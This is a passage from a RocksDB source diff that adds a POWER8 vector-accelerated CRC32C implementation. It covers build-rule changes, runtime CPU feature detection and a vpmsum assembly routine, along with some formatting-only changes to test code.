$(SHARED_C_OBJECTS) +JAVA_ASM_OBJECTS = $(SHARED_ASM_OBJECTS) + +JAVA_CC_LIBOBJECTS = $(patsubst %.cc.o,jl/%.cc.o,$(JAVA_CC_OBJECTS)) +JAVA_C_LIBOBJECTS = $(patsubst %.c.o,jl/%.c.o,$(JAVA_C_OBJECTS)) +JAVA_ASM_LIBOBJECTS = $(patsubst %.S.o,jl/%.S.o,$(JAVA_ASM_OBJECTS)) +java_libobjects = $(JAVA_CC_LIBOBJECTS) $(JAVA_C_LIBOBJECTS) $(JAVA_ASM_LIBOBJECTS) CLEAN_FILES += jl -$(java_libobjects): jl/%.o: %.cc +$(JAVA_CC_LIBOBJECTS): jl/%.cc.o: %.cc + $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) -fPIC -c $< -o $@ $(COVERAGEFLAGS) + +$(JAVA_C_LIBOBJECTS): jl/%.c.o: %.c + $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) -fPIC -c $< -o $@ $(COVERAGEFLAGS) + +$(JAVA_ASM_LIBOBJECTS): jl/%.S.o: %.S $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) -fPIC -c $< -o $@ $(COVERAGEFLAGS) + rocksdbjava: $(java_libobjects) $(AM_V_GEN)cd java;$(MAKE) javalib; $(AM_V_at)rm -f ./java/target/$(ROCKSDBJNILIB) @@ -1703,19 +1742,24 @@ IOSVERSION=$(shell defaults read $(PLATFORMSROOT)/iPhoneOS.platform/version CFBu lipo ios-x86/$@ ios-arm/$@ -create -output $@ else -.cc.o: +%.cc.o: %.cc $(AM_V_CC)$(CXX) $(CXXFLAGS) -c $< -o $@ $(COVERAGEFLAGS) -.c.o: +%.c.o: %.c + $(AM_V_CC)$(CC) $(CFLAGS) -c $< -o $@ + +%.S.o: %.S $(AM_V_CC)$(CC) $(CFLAGS) -c $< -o $@ -endif +endif # --------------------------------------------------------------------------- # Source files dependencies detection # --------------------------------------------------------------------------- all_sources = $(LIB_SOURCES) $(MAIN_SOURCES) $(MOCK_LIB_SOURCES) $(TOOL_LIB_SOURCES) $(BENCH_LIB_SOURCES) $(TEST_LIB_SOURCES) $(EXP_LIB_SOURCES) DEPFILES = $(all_sources:.cc=.d) +DEPFILES_C = $(LIB_SOURCES_C:.c=.d) +DEPFILES_ASM = $(LIB_SOURCES_ASM:.S=.d) # Add proper dependency support so changing a .h file forces a .cc file to # rebuild. @@ -1726,7 +1770,16 @@ $(DEPFILES): %.d: %.cc @$(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) \ -MM -MT'$@' -MT'$(<:.cc=.o)' "$<" -o '$@' -depend: $(DEPFILES) +$(DEPFILES_C): %.d: %.c + @$(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) \ + -MM -MT'$@' -MT'$(<:.c=.o)' "$<" -o '$@' + +$(DEPFILES_ASM): %.d: %.S + @$(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) \ + -MM -MT'$@' -MT'$(<:.S=.o)' "$<" -o '$@' + + +depend: $(DEPFILES) $(DEPFILES_C) $(DEPFILES_ASM) # if the make goal is either "clean" or "format", we shouldn't # try to import the *.d files. 
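The util/crc32c.cc changes below choose a CRC implementation once, at static-initialization time, and route every call through a function pointer. Stripped to its skeleton, the dispatch pattern looks like this (a sketch with stub kernels; only the shape of the dispatch is taken from the patch):

```cpp
#include <cstddef>
#include <cstdint>

using Function = uint32_t (*)(uint32_t, const char*, size_t);

// Stand-ins for the real table-driven and vpmsum-accelerated kernels.
static uint32_t ExtendGeneric(uint32_t crc, const char*, size_t) { return crc; }
static uint32_t ExtendAccelerated(uint32_t crc, const char*, size_t) { return crc; }

// Stand-in for the CPU probe; on Linux/ppc64 the patch tests
// getauxval(AT_HWCAP2) & PPC_FEATURE2_VEC_CRYPTO.
static bool CpuHasFastCrc() { return false; }

static Function Choose_Extend() {
  return CpuHasFastCrc() ? ExtendAccelerated : ExtendGeneric;
}

// Resolved once when the library is loaded, as in the patch.
static Function ChosenExtend = Choose_Extend();

uint32_t Extend(uint32_t crc, const char* buf, size_t size) {
  return ChosenExtend(crc, buf, size);
}
```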
diff --git a/db/db_test_util.cc b/db/db_test_util.cc index 5ca4b19a253..98b6b471e70 100644 --- a/db/db_test_util.cc +++ b/db/db_test_util.cc @@ -277,12 +277,11 @@ Options DBTestBase::GetOptions( Options options = default_options; BlockBasedTableOptions table_options; bool set_block_based_table_factory = true; -#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && \ - !defined(OS_AIX) +#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && \ + !defined(OS_AIX) rocksdb::SyncPoint::GetInstance()->ClearCallBack( "NewRandomAccessFile:O_DIRECT"); - rocksdb::SyncPoint::GetInstance()->ClearCallBack( - "NewWritableFile:O_DIRECT"); + rocksdb::SyncPoint::GetInstance()->ClearCallBack("NewWritableFile:O_DIRECT"); #endif bool can_allow_mmap = IsMemoryMappedAccessSupported(); diff --git a/src.mk b/src.mk index fb7f979396c..39b1ed4895f 100644 --- a/src.mk +++ b/src.mk @@ -204,6 +204,16 @@ LIB_SOURCES = \ utilities/write_batch_with_index/write_batch_with_index.cc \ utilities/write_batch_with_index/write_batch_with_index_internal.cc \ +ifeq (,$(shell $(CXX) -fsyntax-only -maltivec -xc /dev/null 2>&1)) +LIB_SOURCES_ASM =\ + util/crc32c_ppc_asm.S +LIB_SOURCES_C = \ + util/crc32c_ppc.c +else +LIB_SOURCES_ASM = +LIB_SOURCES_C = +endif + TOOL_LIB_SOURCES = \ tools/ldb_cmd.cc \ tools/ldb_tool.cc \ diff --git a/tools/db_stress.cc b/tools/db_stress.cc index db905f0c887..b5d0c7589d8 100644 --- a/tools/db_stress.cc +++ b/tools/db_stress.cc @@ -2370,15 +2370,15 @@ int main(int argc, char** argv) { #if !defined(NDEBUG) && !defined(OS_MACOSX) && !defined(OS_WIN) && \ !defined(OS_SOLARIS) && !defined(OS_AIX) rocksdb::SyncPoint::GetInstance()->SetCallBack( - "NewWritableFile:O_DIRECT", [&](void* arg) { - int* val = static_cast<int*>(arg); - *val &= ~O_DIRECT; - }); + "NewWritableFile:O_DIRECT", [&](void* arg) { + int* val = static_cast<int*>(arg); + *val &= ~O_DIRECT; + }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "NewRandomAccessFile:O_DIRECT", [&](void* arg) { - int* val = static_cast<int*>(arg); - *val &= ~O_DIRECT; - }); + "NewRandomAccessFile:O_DIRECT", [&](void* arg) { + int* val = static_cast<int*>(arg); + *val &= ~O_DIRECT; + }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); #endif diff --git a/util/crc32c.cc b/util/crc32c.cc index ae36f82305b..9b78c92f181 100644 --- a/util/crc32c.cc +++ b/util/crc32c.cc @@ -18,9 +18,32 @@ #endif #include "util/coding.h" +#ifdef __powerpc64__ +#include "util/crc32c_ppc.h" +#include "util/crc32c_ppc_constants.h" + +#if __linux__ +#include <sys/auxv.h> + +#ifndef PPC_FEATURE2_VEC_CRYPTO +#define PPC_FEATURE2_VEC_CRYPTO 0x02000000 +#endif + +#ifndef AT_HWCAP2 +#define AT_HWCAP2 26 +#endif + +#endif /* __linux__ */ + +#endif + namespace rocksdb { namespace crc32c { +#ifdef __powerpc64__ +static int arch_ppc_crc32 = 0; +#endif + static const uint32_t table0_[256] = { 0x00000000, 0xf26b8303, 0xe13b70f7, 0x1350f3f4, 0xc79a971f, 0x35f1141c, 0x26a1e7e8, 0xd4ca64eb, @@ -371,6 +394,7 @@ uint32_t ExtendImpl(uint32_t crc, const char* buf, size_t size) { } // Detect if SSE4.2 is supported or not.
+#ifndef HAVE_POWER8 static bool isSSE42() { #ifndef HAVE_SSE42 return false; @@ -387,15 +411,58 @@ static bool isSSE42() { return false; #endif } +#endif typedef uint32_t (*Function)(uint32_t, const char*, size_t); +#if defined(HAVE_POWER8) && defined(HAS_ALTIVEC) +uint32_t ExtendPPCImpl(uint32_t crc, const char *buf, size_t size) { + return crc32c_ppc(crc, (const unsigned char *)buf, size); +} + +#if __linux__ +static int arch_ppc_probe(void) { + arch_ppc_crc32 = 0; + +#if defined(__powerpc64__) + if (getauxval(AT_HWCAP2) & PPC_FEATURE2_VEC_CRYPTO) arch_ppc_crc32 = 1; +#endif /* __powerpc64__ */ + + return arch_ppc_crc32; } +#endif // __linux__ + +static bool isAltiVec() { + if (arch_ppc_probe()) { + return true; + } else { + return false; + } +} +#endif + static inline Function Choose_Extend() { +#ifndef HAVE_POWER8 return isSSE42() ? ExtendImpl<Fast_CRC32> : ExtendImpl<Slow_CRC32>; +#else + return isAltiVec() ? ExtendPPCImpl : ExtendImpl<Slow_CRC32>; +#endif } bool IsFastCrc32Supported() { - return isSSE42(); + bool has_fast_crc = false; +#ifdef HAVE_POWER8 +#ifdef HAS_ALTIVEC + if (arch_ppc_probe()) { + has_fast_crc = true; + } +#else + has_fast_crc = false; +#endif +#else + has_fast_crc = isSSE42(); +#endif + return has_fast_crc; } Function ChosenExtend = Choose_Extend(); diff --git a/util/crc32c_ppc.c b/util/crc32c_ppc.c new file mode 100644 index 00000000000..3c517c88ca1 --- /dev/null +++ b/util/crc32c_ppc.c @@ -0,0 +1,95 @@ +// Copyright (c) 2017 International Business Machines Corp. +// All rights reserved. +// This source code is licensed under the BSD-style license found in the +// LICENSE file in the root directory of this source tree. An additional grant +// of patent rights can be found in the PATENTS file in the same directory. +// This source code is also licensed under the GPLv2 license found in the +// COPYING file in the root directory of this source tree. + +#define CRC_TABLE +#include <stdint.h> +#include <stdlib.h> +#include <strings.h> +#include "util/crc32c_ppc_constants.h" + +#define VMX_ALIGN 16 +#define VMX_ALIGN_MASK (VMX_ALIGN - 1) + +#ifdef REFLECT +static unsigned int crc32_align(unsigned int crc, unsigned char const *p, + unsigned long len) { + while (len--) crc = crc_table[(crc ^ *p++) & 0xff] ^ (crc >> 8); + return crc; +} +#endif + +#ifdef HAVE_POWER8 +unsigned int __crc32_vpmsum(unsigned int crc, unsigned char const *p, + unsigned long len); + +static uint32_t crc32_vpmsum(uint32_t crc, unsigned char const *data, + unsigned len) { + unsigned int prealign; + unsigned int tail; + +#ifdef CRC_XOR + crc ^= 0xffffffff; +#endif + + if (len < VMX_ALIGN + VMX_ALIGN_MASK) { + crc = crc32_align(crc, data, (unsigned long)len); + goto out; + } + + if ((unsigned long)data & VMX_ALIGN_MASK) { + prealign = VMX_ALIGN - ((unsigned long)data & VMX_ALIGN_MASK); + crc = crc32_align(crc, data, prealign); + len -= prealign; + data += prealign; + } + + crc = __crc32_vpmsum(crc, data, (unsigned long)len & ~VMX_ALIGN_MASK); + + tail = len & VMX_ALIGN_MASK; + if (tail) { + data += len & ~VMX_ALIGN_MASK; + crc = crc32_align(crc, data, tail); + } + +out: +#ifdef CRC_XOR + crc ^= 0xffffffff; +#endif + + return crc; +} + +/* This wrapper function works around the fact that crc32_vpmsum + * does not gracefully handle the case where the data pointer is NULL. There + * may be room for performance improvement here.
+ */ +uint32_t crc32c_ppc(uint32_t crc, unsigned char const *data, unsigned len) { + unsigned char *buf2; + + if (!data) { + buf2 = (unsigned char *)malloc(len); + bzero(buf2, len); + crc = crc32_vpmsum(crc, buf2, len); + free(buf2); + } else { + crc = crc32_vpmsum(crc, data, (unsigned long)len); + } + return crc; +} + +#else /* HAVE_POWER8 */ + +/* This symbol has to exist on non-ppc architectures (and on legacy + * ppc systems using power7 or below) in order to compile properly + * there, even though it won't be called. + */ +uint32_t crc32c_ppc(uint32_t crc, unsigned char const *data, unsigned len) { + return 0; +} + +#endif /* HAVE_POWER8 */ diff --git a/util/crc32c_ppc.h b/util/crc32c_ppc.h new file mode 100644 index 00000000000..b52ad9b2a42 --- /dev/null +++ b/util/crc32c_ppc.h @@ -0,0 +1,23 @@ +// Copyright (c) 2017 International Business Machines Corp. +// All rights reserved. +// This source code is licensed under the BSD-style license found in the +// LICENSE file in the root directory of this source tree. An additional grant +// of patent rights can be found in the PATENTS file in the same directory. +// This source code is also licensed under the GPLv2 license found in the +// COPYING file in the root directory of this source tree. + +#ifndef CRC32C_PPC_H +#define CRC32C_PPC_H + +#ifdef __cplusplus +extern "C" { +#endif + +extern uint32_t crc32c_ppc(uint32_t crc, unsigned char const *buffer, + unsigned len); + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/util/crc32c_ppc_asm.S b/util/crc32c_ppc_asm.S new file mode 100644 index 00000000000..6de79797335 --- /dev/null +++ b/util/crc32c_ppc_asm.S @@ -0,0 +1,753 @@ +// Copyright (c) 2015 Anton Blanchard , IBM +// Copyright (c) 2017 International Business Machines Corp. +// All rights reserved. +// This source code is licensed under the BSD-style license found in the +// LICENSE file in the root directory of this source tree. An additional grant +// of patent rights can be found in the PATENTS file in the same directory. +// This source code is also licensed under the GPLv2 license found in the +// COPYING file in the root directory of this source tree. 
+ +#include <ppc-asm.h> +#include "ppc-opcode.h" + +#undef toc + +#ifndef r1 +#define r1 1 +#endif + +#ifndef r2 +#define r2 2 +#endif + + .section .rodata +.balign 16 + +.byteswap_constant: + /* byte reverse permute constant */ + .octa 0x0F0E0D0C0B0A09080706050403020100 + +#define __ASSEMBLY__ +#include "crc32c_ppc_constants.h" + + .text + +#if defined(__BIG_ENDIAN__) && defined(REFLECT) +#define BYTESWAP_DATA +#elif defined(__LITTLE_ENDIAN__) && !defined(REFLECT) +#define BYTESWAP_DATA +#else +#undef BYTESWAP_DATA +#endif + +#define off16 r25 +#define off32 r26 +#define off48 r27 +#define off64 r28 +#define off80 r29 +#define off96 r30 +#define off112 r31 + +#define const1 v24 +#define const2 v25 + +#define byteswap v26 +#define mask_32bit v27 +#define mask_64bit v28 +#define zeroes v29 + +#ifdef BYTESWAP_DATA +#define VPERM(A, B, C, D) vperm A, B, C, D +#else +#define VPERM(A, B, C, D) +#endif + +/* unsigned int __crc32_vpmsum(unsigned int crc, void *p, unsigned long len) */ +FUNC_START(__crc32_vpmsum) + std r31,-8(r1) + std r30,-16(r1) + std r29,-24(r1) + std r28,-32(r1) + std r27,-40(r1) + std r26,-48(r1) + std r25,-56(r1) + + li off16,16 + li off32,32 + li off48,48 + li off64,64 + li off80,80 + li off96,96 + li off112,112 + li r0,0 + + /* Enough room for saving 10 non volatile VMX registers */ + subi r6,r1,56+10*16 + subi r7,r1,56+2*16 + + stvx v20,0,r6 + stvx v21,off16,r6 + stvx v22,off32,r6 + stvx v23,off48,r6 + stvx v24,off64,r6 + stvx v25,off80,r6 + stvx v26,off96,r6 + stvx v27,off112,r6 + stvx v28,0,r7 + stvx v29,off16,r7 + + mr r10,r3 + + vxor zeroes,zeroes,zeroes + vspltisw v0,-1 + + vsldoi mask_32bit,zeroes,v0,4 + vsldoi mask_64bit,zeroes,v0,8 + + /* Get the initial value into v8 */ + vxor v8,v8,v8 + MTVRD(v8, r3) +#ifdef REFLECT + vsldoi v8,zeroes,v8,8 /* shift into bottom 32 bits */ +#else + vsldoi v8,v8,zeroes,4 /* shift into top 32 bits */ +#endif + +#ifdef BYTESWAP_DATA + addis r3,r2,.byteswap_constant@toc@ha + addi r3,r3,.byteswap_constant@toc@l + + lvx byteswap,0,r3 + addi r3,r3,16 +#endif + + cmpdi r5,256 + blt .Lshort + + rldicr r6,r5,0,56 + + /* Checksum in blocks of MAX_SIZE */ +1: lis r7,MAX_SIZE@h + ori r7,r7,MAX_SIZE@l + mr r9,r7 + cmpd r6,r7 + bgt 2f + mr r7,r6 +2: subf r6,r7,r6 + + /* our main loop does 128 bytes at a time */ + srdi r7,r7,7 + + /* + * Work out the offset into the constants table to start at. Each + * constant is 16 bytes, and it is used against 128 bytes of input + * data - 128 / 16 = 8 + */ + sldi r8,r7,4 + srdi r9,r9,3 + subf r8,r8,r9 + + /* We reduce our final 128 bytes in a separate step */ + addi r7,r7,-1 + mtctr r7 + + addis r3,r2,.constants@toc@ha + addi r3,r3,.constants@toc@l + + /* Find the start of our constants */ + add r3,r3,r8 + + /* zero v0-v7 which will contain our checksums */ + vxor v0,v0,v0 + vxor v1,v1,v1 + vxor v2,v2,v2 + vxor v3,v3,v3 + vxor v4,v4,v4 + vxor v5,v5,v5 + vxor v6,v6,v6 + vxor v7,v7,v7 + + lvx const1,0,r3 + + /* + * If we are looping back to consume more data we use the values + * already in v16-v23.
+ */ + cmpdi r0,1 + beq 2f + + /* First warm up pass */ + lvx v16,0,r4 + lvx v17,off16,r4 + VPERM(v16,v16,v16,byteswap) + VPERM(v17,v17,v17,byteswap) + lvx v18,off32,r4 + lvx v19,off48,r4 + VPERM(v18,v18,v18,byteswap) + VPERM(v19,v19,v19,byteswap) + lvx v20,off64,r4 + lvx v21,off80,r4 + VPERM(v20,v20,v20,byteswap) + VPERM(v21,v21,v21,byteswap) + lvx v22,off96,r4 + lvx v23,off112,r4 + VPERM(v22,v22,v22,byteswap) + VPERM(v23,v23,v23,byteswap) + addi r4,r4,8*16 + + /* xor in initial value */ + vxor v16,v16,v8 + +2: bdz .Lfirst_warm_up_done + + addi r3,r3,16 + lvx const2,0,r3 + + /* Second warm up pass */ + VPMSUMD(v8,v16,const1) + lvx v16,0,r4 + VPERM(v16,v16,v16,byteswap) + ori r2,r2,0 + + VPMSUMD(v9,v17,const1) + lvx v17,off16,r4 + VPERM(v17,v17,v17,byteswap) + ori r2,r2,0 + + VPMSUMD(v10,v18,const1) + lvx v18,off32,r4 + VPERM(v18,v18,v18,byteswap) + ori r2,r2,0 + + VPMSUMD(v11,v19,const1) + lvx v19,off48,r4 + VPERM(v19,v19,v19,byteswap) + ori r2,r2,0 + + VPMSUMD(v12,v20,const1) + lvx v20,off64,r4 + VPERM(v20,v20,v20,byteswap) + ori r2,r2,0 + + VPMSUMD(v13,v21,const1) + lvx v21,off80,r4 + VPERM(v21,v21,v21,byteswap) + ori r2,r2,0 + + VPMSUMD(v14,v22,const1) + lvx v22,off96,r4 + VPERM(v22,v22,v22,byteswap) + ori r2,r2,0 + + VPMSUMD(v15,v23,const1) + lvx v23,off112,r4 + VPERM(v23,v23,v23,byteswap) + + addi r4,r4,8*16 + + bdz .Lfirst_cool_down + + /* + * main loop. We modulo schedule it such that it takes three iterations + * to complete - first iteration load, second iteration vpmsum, third + * iteration xor. + */ + .balign 16 +4: lvx const1,0,r3 + addi r3,r3,16 + ori r2,r2,0 + + vxor v0,v0,v8 + VPMSUMD(v8,v16,const2) + lvx v16,0,r4 + VPERM(v16,v16,v16,byteswap) + ori r2,r2,0 + + vxor v1,v1,v9 + VPMSUMD(v9,v17,const2) + lvx v17,off16,r4 + VPERM(v17,v17,v17,byteswap) + ori r2,r2,0 + + vxor v2,v2,v10 + VPMSUMD(v10,v18,const2) + lvx v18,off32,r4 + VPERM(v18,v18,v18,byteswap) + ori r2,r2,0 + + vxor v3,v3,v11 + VPMSUMD(v11,v19,const2) + lvx v19,off48,r4 + VPERM(v19,v19,v19,byteswap) + lvx const2,0,r3 + ori r2,r2,0 + + vxor v4,v4,v12 + VPMSUMD(v12,v20,const1) + lvx v20,off64,r4 + VPERM(v20,v20,v20,byteswap) + ori r2,r2,0 + + vxor v5,v5,v13 + VPMSUMD(v13,v21,const1) + lvx v21,off80,r4 + VPERM(v21,v21,v21,byteswap) + ori r2,r2,0 + + vxor v6,v6,v14 + VPMSUMD(v14,v22,const1) + lvx v22,off96,r4 + VPERM(v22,v22,v22,byteswap) + ori r2,r2,0 + + vxor v7,v7,v15 + VPMSUMD(v15,v23,const1) + lvx v23,off112,r4 + VPERM(v23,v23,v23,byteswap) + + addi r4,r4,8*16 + + bdnz 4b + +.Lfirst_cool_down: + /* First cool down pass */ + lvx const1,0,r3 + addi r3,r3,16 + + vxor v0,v0,v8 + VPMSUMD(v8,v16,const1) + ori r2,r2,0 + + vxor v1,v1,v9 + VPMSUMD(v9,v17,const1) + ori r2,r2,0 + + vxor v2,v2,v10 + VPMSUMD(v10,v18,const1) + ori r2,r2,0 + + vxor v3,v3,v11 + VPMSUMD(v11,v19,const1) + ori r2,r2,0 + + vxor v4,v4,v12 + VPMSUMD(v12,v20,const1) + ori r2,r2,0 + + vxor v5,v5,v13 + VPMSUMD(v13,v21,const1) + ori r2,r2,0 + + vxor v6,v6,v14 + VPMSUMD(v14,v22,const1) + ori r2,r2,0 + + vxor v7,v7,v15 + VPMSUMD(v15,v23,const1) + ori r2,r2,0 + +.Lsecond_cool_down: + /* Second cool down pass */ + vxor v0,v0,v8 + vxor v1,v1,v9 + vxor v2,v2,v10 + vxor v3,v3,v11 + vxor v4,v4,v12 + vxor v5,v5,v13 + vxor v6,v6,v14 + vxor v7,v7,v15 + +#ifdef REFLECT + /* + * vpmsumd produces a 96 bit result in the least significant bits + * of the register. Since we are bit reflected we have to shift it + * left 32 bits so it occupies the least significant bits in the + * bit reflected domain. 
+ */ + vsldoi v0,v0,zeroes,4 + vsldoi v1,v1,zeroes,4 + vsldoi v2,v2,zeroes,4 + vsldoi v3,v3,zeroes,4 + vsldoi v4,v4,zeroes,4 + vsldoi v5,v5,zeroes,4 + vsldoi v6,v6,zeroes,4 + vsldoi v7,v7,zeroes,4 +#endif + + /* xor with last 1024 bits */ + lvx v8,0,r4 + lvx v9,off16,r4 + VPERM(v8,v8,v8,byteswap) + VPERM(v9,v9,v9,byteswap) + lvx v10,off32,r4 + lvx v11,off48,r4 + VPERM(v10,v10,v10,byteswap) + VPERM(v11,v11,v11,byteswap) + lvx v12,off64,r4 + lvx v13,off80,r4 + VPERM(v12,v12,v12,byteswap) + VPERM(v13,v13,v13,byteswap) + lvx v14,off96,r4 + lvx v15,off112,r4 + VPERM(v14,v14,v14,byteswap) + VPERM(v15,v15,v15,byteswap) + + addi r4,r4,8*16 + + vxor v16,v0,v8 + vxor v17,v1,v9 + vxor v18,v2,v10 + vxor v19,v3,v11 + vxor v20,v4,v12 + vxor v21,v5,v13 + vxor v22,v6,v14 + vxor v23,v7,v15 + + li r0,1 + cmpdi r6,0 + addi r6,r6,128 + bne 1b + + /* Work out how many bytes we have left */ + andi. r5,r5,127 + + /* Calculate where in the constant table we need to start */ + subfic r6,r5,128 + add r3,r3,r6 + + /* How many 16 byte chunks are in the tail */ + srdi r7,r5,4 + mtctr r7 + + /* + * Reduce the previously calculated 1024 bits to 64 bits, shifting + * 32 bits to include the trailing 32 bits of zeros + */ + lvx v0,0,r3 + lvx v1,off16,r3 + lvx v2,off32,r3 + lvx v3,off48,r3 + lvx v4,off64,r3 + lvx v5,off80,r3 + lvx v6,off96,r3 + lvx v7,off112,r3 + addi r3,r3,8*16 + + VPMSUMW(v0,v16,v0) + VPMSUMW(v1,v17,v1) + VPMSUMW(v2,v18,v2) + VPMSUMW(v3,v19,v3) + VPMSUMW(v4,v20,v4) + VPMSUMW(v5,v21,v5) + VPMSUMW(v6,v22,v6) + VPMSUMW(v7,v23,v7) + + /* Now reduce the tail (0 - 112 bytes) */ + cmpdi r7,0 + beq 1f + + lvx v16,0,r4 + lvx v17,0,r3 + VPERM(v16,v16,v16,byteswap) + VPMSUMW(v16,v16,v17) + vxor v0,v0,v16 + bdz 1f + + lvx v16,off16,r4 + lvx v17,off16,r3 + VPERM(v16,v16,v16,byteswap) + VPMSUMW(v16,v16,v17) + vxor v0,v0,v16 + bdz 1f + + lvx v16,off32,r4 + lvx v17,off32,r3 + VPERM(v16,v16,v16,byteswap) + VPMSUMW(v16,v16,v17) + vxor v0,v0,v16 + bdz 1f + + lvx v16,off48,r4 + lvx v17,off48,r3 + VPERM(v16,v16,v16,byteswap) + VPMSUMW(v16,v16,v17) + vxor v0,v0,v16 + bdz 1f + + lvx v16,off64,r4 + lvx v17,off64,r3 + VPERM(v16,v16,v16,byteswap) + VPMSUMW(v16,v16,v17) + vxor v0,v0,v16 + bdz 1f + + lvx v16,off80,r4 + lvx v17,off80,r3 + VPERM(v16,v16,v16,byteswap) + VPMSUMW(v16,v16,v17) + vxor v0,v0,v16 + bdz 1f + + lvx v16,off96,r4 + lvx v17,off96,r3 + VPERM(v16,v16,v16,byteswap) + VPMSUMW(v16,v16,v17) + vxor v0,v0,v16 + + /* Now xor all the parallel chunks together */ +1: vxor v0,v0,v1 + vxor v2,v2,v3 + vxor v4,v4,v5 + vxor v6,v6,v7 + + vxor v0,v0,v2 + vxor v4,v4,v6 + + vxor v0,v0,v4 + +.Lbarrett_reduction: + /* Barrett constants */ + addis r3,r2,.barrett_constants@toc@ha + addi r3,r3,.barrett_constants@toc@l + + lvx const1,0,r3 + lvx const2,off16,r3 + + vsldoi v1,v0,v0,8 + vxor v0,v0,v1 /* xor two 64 bit results together */ + +#ifdef REFLECT + /* shift left one bit */ + vspltisb v1,1 + vsl v0,v0,v1 +#endif + + vand v0,v0,mask_64bit + +#ifndef REFLECT + /* + * Now for the Barrett reduction algorithm. The idea is to calculate q, + * the multiple of our polynomial that we need to subtract. By + * doing the computation 2x bits higher (ie 64 bits) and shifting the + * result back down 2x bits, we round down to the nearest multiple. + */ + VPMSUMD(v1,v0,const1) /* ma */ + vsldoi v1,zeroes,v1,8 /* q = floor(ma/(2^64)) */ + VPMSUMD(v1,v1,const2) /* qn */ + vxor v0,v0,v1 /* a - qn, subtraction is xor in GF(2) */ + + /* + * Get the result into r3. 
We need to shift it left 8 bytes: + * V0 [ 0 1 2 X ] + * V0 [ 0 X 2 3 ] + */ + vsldoi v0,v0,zeroes,8 /* shift result into top 64 bits */ +#else + /* + * The reflected version of Barrett reduction. Instead of bit + * reflecting our data (which is expensive to do), we bit reflect our + * constants and our algorithm, which means the intermediate data in + * our vector registers goes from 0-63 instead of 63-0. We can reflect + * the algorithm because we don't carry in mod 2 arithmetic. + */ + vand v1,v0,mask_32bit /* bottom 32 bits of a */ + VPMSUMD(v1,v1,const1) /* ma */ + vand v1,v1,mask_32bit /* bottom 32bits of ma */ + VPMSUMD(v1,v1,const2) /* qn */ + vxor v0,v0,v1 /* a - qn, subtraction is xor in GF(2) */ + + /* + * Since we are bit reflected, the result (ie the low 32 bits) is in + * the high 32 bits. We just need to shift it left 4 bytes + * V0 [ 0 1 X 3 ] + * V0 [ 0 X 2 3 ] + */ + vsldoi v0,v0,zeroes,4 /* shift result into top 64 bits of */ +#endif + + /* Get it into r3 */ + MFVRD(r3, v0) + +.Lout: + subi r6,r1,56+10*16 + subi r7,r1,56+2*16 + + lvx v20,0,r6 + lvx v21,off16,r6 + lvx v22,off32,r6 + lvx v23,off48,r6 + lvx v24,off64,r6 + lvx v25,off80,r6 + lvx v26,off96,r6 + lvx v27,off112,r6 + lvx v28,0,r7 + lvx v29,off16,r7 + + ld r31,-8(r1) + ld r30,-16(r1) + ld r29,-24(r1) + ld r28,-32(r1) + ld r27,-40(r1) + ld r26,-48(r1) + ld r25,-56(r1) + + blr + +.Lfirst_warm_up_done: + lvx const1,0,r3 + addi r3,r3,16 + + VPMSUMD(v8,v16,const1) + VPMSUMD(v9,v17,const1) + VPMSUMD(v10,v18,const1) + VPMSUMD(v11,v19,const1) + VPMSUMD(v12,v20,const1) + VPMSUMD(v13,v21,const1) + VPMSUMD(v14,v22,const1) + VPMSUMD(v15,v23,const1) + + b .Lsecond_cool_down + +.Lshort: + cmpdi r5,0 + beq .Lzero + + addis r3,r2,.short_constants@toc@ha + addi r3,r3,.short_constants@toc@l + + /* Calculate where in the constant table we need to start */ + subfic r6,r5,256 + add r3,r3,r6 + + /* How many 16 byte chunks? 
*/ + srdi r7,r5,4 + mtctr r7 + + vxor v19,v19,v19 + vxor v20,v20,v20 + + lvx v0,0,r4 + lvx v16,0,r3 + VPERM(v0,v0,v16,byteswap) + vxor v0,v0,v8 /* xor in initial value */ + VPMSUMW(v0,v0,v16) + bdz .Lv0 + + lvx v1,off16,r4 + lvx v17,off16,r3 + VPERM(v1,v1,v17,byteswap) + VPMSUMW(v1,v1,v17) + bdz .Lv1 + + lvx v2,off32,r4 + lvx v16,off32,r3 + VPERM(v2,v2,v16,byteswap) + VPMSUMW(v2,v2,v16) + bdz .Lv2 + + lvx v3,off48,r4 + lvx v17,off48,r3 + VPERM(v3,v3,v17,byteswap) + VPMSUMW(v3,v3,v17) + bdz .Lv3 + + lvx v4,off64,r4 + lvx v16,off64,r3 + VPERM(v4,v4,v16,byteswap) + VPMSUMW(v4,v4,v16) + bdz .Lv4 + + lvx v5,off80,r4 + lvx v17,off80,r3 + VPERM(v5,v5,v17,byteswap) + VPMSUMW(v5,v5,v17) + bdz .Lv5 + + lvx v6,off96,r4 + lvx v16,off96,r3 + VPERM(v6,v6,v16,byteswap) + VPMSUMW(v6,v6,v16) + bdz .Lv6 + + lvx v7,off112,r4 + lvx v17,off112,r3 + VPERM(v7,v7,v17,byteswap) + VPMSUMW(v7,v7,v17) + bdz .Lv7 + + addi r3,r3,128 + addi r4,r4,128 + + lvx v8,0,r4 + lvx v16,0,r3 + VPERM(v8,v8,v16,byteswap) + VPMSUMW(v8,v8,v16) + bdz .Lv8 + + lvx v9,off16,r4 + lvx v17,off16,r3 + VPERM(v9,v9,v17,byteswap) + VPMSUMW(v9,v9,v17) + bdz .Lv9 + + lvx v10,off32,r4 + lvx v16,off32,r3 + VPERM(v10,v10,v16,byteswap) + VPMSUMW(v10,v10,v16) + bdz .Lv10 + + lvx v11,off48,r4 + lvx v17,off48,r3 + VPERM(v11,v11,v17,byteswap) + VPMSUMW(v11,v11,v17) + bdz .Lv11 + + lvx v12,off64,r4 + lvx v16,off64,r3 + VPERM(v12,v12,v16,byteswap) + VPMSUMW(v12,v12,v16) + bdz .Lv12 + + lvx v13,off80,r4 + lvx v17,off80,r3 + VPERM(v13,v13,v17,byteswap) + VPMSUMW(v13,v13,v17) + bdz .Lv13 + + 